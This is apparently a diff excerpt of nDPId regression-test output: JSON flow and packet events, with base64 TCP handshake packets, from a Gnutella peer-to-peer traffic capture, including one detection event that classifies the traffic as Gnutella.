-00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":70172,"flow_last_seen":70172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":70172,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.203.131","src_port":50242,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":70172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70172,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0LJpAAIAGiMUKAAIPbdLLg8RCGMrxPNpbAAAAAIAC+vCGFQAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":70172,"flow_last_seen":70172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":70172,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.138.129.252","src_port":50243,"dst_port":27962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":70172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70172,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UWtAAIAGasMKAAIPsIqB\/MRDbToYK0huAAAAAIAC+vCjcgAAAgQFtAEDAwgBAQQC"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":65240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":65240,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAp8AAEAGUxwOxwo8CgACD1uixCMAa2wB\/Z82JWAS\/\/+zDQAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":65241,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":65241,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoSFFAAIAGjW0KAAIPDscKPMQjW6L9nzYlAGtsAlAQ+vDP2QAA"} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":65062,"flow_last_seen":65241,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":65241,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xttAAIAGndgKAAIPsIDZgMQYsIr8Y98AAAAAAIAC+vCOBwAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0B1tAAIAGzIQKAAIPVoHEVMQWJrsID0+\/AAAAAIAC+vAKmwAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iq1AAIAGH9UKAAIPTnpducQZGMpcVbolAAAAAIAC+vDIfgAAAgQFtAEDAwgBAQQC"} 
+00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66076,"flow_last_seen":66076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66076,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":50214,"dst_port":53808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":66076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FTdAAIAG3SoKAAIPUMGrksQm0jCYt6bIAAAAAIAC+vCV5QAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66077,"flow_last_seen":66077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66077,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.244.64.237","src_port":50215,"dst_port":4704,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":66077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0CoxAAIAGJkgKAAIPfPRA7cQnEmB1c07JAAAAAIAC+vAPawAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66077,"flow_last_seen":66077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66077,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":50216,"dst_port":3256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":66077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdlAAIAGUVwKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} 
+00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66078,"flow_last_seen":66078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66078,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50217,"dst_port":54958,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":66078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66078,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8JAAIAGrlQKAAIPcfxWosQp1q4KULlcAAAAAIAC+vBA7QAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66078,"flow_last_seen":66078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66078,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.103.247.94","src_port":50218,"dst_port":59045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":66078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66078,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EU5AAIAGi6EKAAIPWmf3XsQq5qXgntCpAAAAAIAC+vC6MQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66079,"flow_last_seen":66079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66079,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":66079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66079,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gY5AAIAGBqEKAAIPwXmlDMQr2FBBRhZnAAAAAIAC+vANYQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":67044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67044,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0kpRAAIAGVgYKAAIPWk6rzMQfGMqXoNUlAAAAAIAC+vAYRgAAAgQFtAEDAwgBAQQC"} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":67044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67044,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FYBAAIAGQksKAAIPfNoaEMQcJgCBbg3uAAAAAIAC+vBXrQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":67044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67044,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0XTFAAIAGk6oKAAIPci6Lq8Qdy5gelScRAAAAAIAC+vCU2gAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67092,"flow_last_seen":67092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67092,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":67092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0k7lAAIAGcTAKAAIPJOnE4sQsDuwTBJqfAAAAAIAC+vD9iAAAAgQFtAEDAwgBAQQC"} 
+00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67093,"flow_last_seen":67093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67093,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":50221,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":67093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67093,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0faFAAIAGiKYKAAIPO2itBcQtwyRMUgplAAAAAIAC+vChmQAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67093,"flow_last_seen":67093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67093,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":67093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67093,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0TEpAAIAGm28KAAIPdw6P7cQuGXtEBOluAAAAAIAC+vBV+AAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67094,"flow_last_seen":67094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67094,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":67094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67094,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0R0xAAIAGN+UKAAIPdqf43MQv9oQzn2SqAAAAAIAC+vCljgAAAgQFtAEDAwgBAQQC"} 
+00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67094,"flow_last_seen":67094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67094,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.125.63.97","src_port":50224,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":67094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67094,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UtBAAIAGDgcKAAIPTn0\/YcQwGMq9KdLlAAAAAIAC+vBtKAAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67095,"flow_last_seen":67095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67095,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.81.147","src_port":50225,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":67095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67095,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+zZAAIAGNBkKAAIPbdJRk8QxYOCX52ZFAAAAAIAC+vCFbAAAAgQFtAEDAwgBAQQC"} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":67457,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":67457,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAqUAAP8GpiB3Do\/tCgACDxl7xC4AAAAARATpb1AUAACRqAAA"} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":67657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":67657,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAqYAAP8Gw08k6cTiCgACDw7sxCwAAAAAEwSaoFAUAAA5OQAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":67969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67969,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0TEtAAIAGm24KAAIPdw6P7cQuGXtEBOluAAAAAIAC+vBV+AAAAgQFtAEDAwgBAQQC"} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DWtAAIAG8s0KAAIPVXWZB8Qlw9oAc\/5TAAAAAIAC+vDyzAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0q8xAAIAGVuUKAAIPd+10FsQgIevuSsSrAAAAAIAC+vDjCgAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0pW9AAIAGEbYKAAIPJOoSpsQi79zHbZnNAAAAAIAC+vAbRgAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0NVtAAIAG3iAKAAIPXxF8KMQkGnhkTfi6AAAAAIAC+vBRMgAAAgQFtAEDAwgBAQQC"} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02YFAAIAG1DgKAAIPcfzO\/sQhwbNg4z+5AAAAAIAC+vAApAAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68108,"flow_last_seen":68108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68108,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":68108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68108,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bmJAAIAGaL8KAAIPdPGiosQyPT31tKkaAAAAAIAC+vCwPQAAAgQFtAEDAwgBAQQC"} 
+00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68108,"flow_last_seen":68108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68108,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.246.157.94","src_port":50227,"dst_port":51175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":68108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68108,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0K4hAAIAGtdgKAAIPb\/adXsQzx+daqkeOAAAAAIAC+vAsaAAAAgQFtAEDAwgBAQQC"} 